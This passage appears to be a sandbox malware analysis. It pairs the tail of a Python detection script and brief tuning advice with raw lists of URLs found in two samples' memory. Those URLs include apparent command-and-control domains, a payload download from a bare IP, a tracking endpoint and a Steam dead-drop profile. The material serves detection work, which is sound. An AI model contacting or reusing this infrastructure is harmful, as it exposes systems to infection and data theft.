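                findings.append(("non_browser_ua", f"{ua} -> {host}{uri}"))
            if is_ip_literal(host) and uri.lower().endswith(".exe"):
                findings.append(("exe_from_bare_ip", f"http://{host}{uri}"))
            if host == "steamcommunity.com" and STEAM_PROFILE.match(uri):
                findings.append(("steam_profile_lookup", uri))
            if matches_c2(host):
                findings.append(("http_to_c2", host))
    return findings


def by_rule(findings):
    out = {}
    for rule, detail in findings:
        out.setdefault(rule, []).append(detail)
    return out


if __name__ == "__main__":
    for rule, details in by_rule(analyze(EVENTS)).items():
        print(f"{rule}: {details}")
```

Two of these rules carry the most weight outside a sandbox. The direct-to-IP check needs the DNS log and the connection log joined on client and time, and it is only meaningful for hosts that are expected to resolve names before connecting. The Steam profile lookup is a legitimate request that only matters when a non-browser process makes it, so in production it should be joined with process telemetry rather than alerted on alone; the report flags it because the sandbox knows which process issued it.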
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://127.0.0.1:27060
    Source: L7GNkeVm5e.exe, L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539968169.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000003.4407439602.00000000006D3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
    Source: L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539968169.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000003.4407439602.00000000006D3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe(
    Source: L7GNkeVm5e.exe, 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE
    Source: EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.m
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.5.dr; String found in binary or memory: http://upx.sf.net
    Source: EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.co
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://api.steampowered.com/
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://apporholis.shop:443/apiiP
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://checkout.steampowered.com/
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://chipdonkeruz.shop:443/apih
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/
    Source: EB86.tmp.exe, 00000002.00000002.2358880463.000000000064B000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168246436.0000000000648000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168282667.000000000064A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/m
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://crowdwarek.shop:443/api
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://help.steampowered.com/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://help.steampowered.com/en/
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539850806.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
    Source: L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539850806.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/fh/0
    Source: L7GNkeVm5e.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
    Source: L7GNkeVm5e.exe, 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
    Source: L7GNkeVm5e.exe, 00000000.00000002.4539850806.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://robinsharez.shop:443/api
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skidjazzyric.click:443/api
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900$
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/rf
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900K
    Source: EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167928507.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: EB86.tmp.exe, 00000002.00000003.2167928507.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
    Source: EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
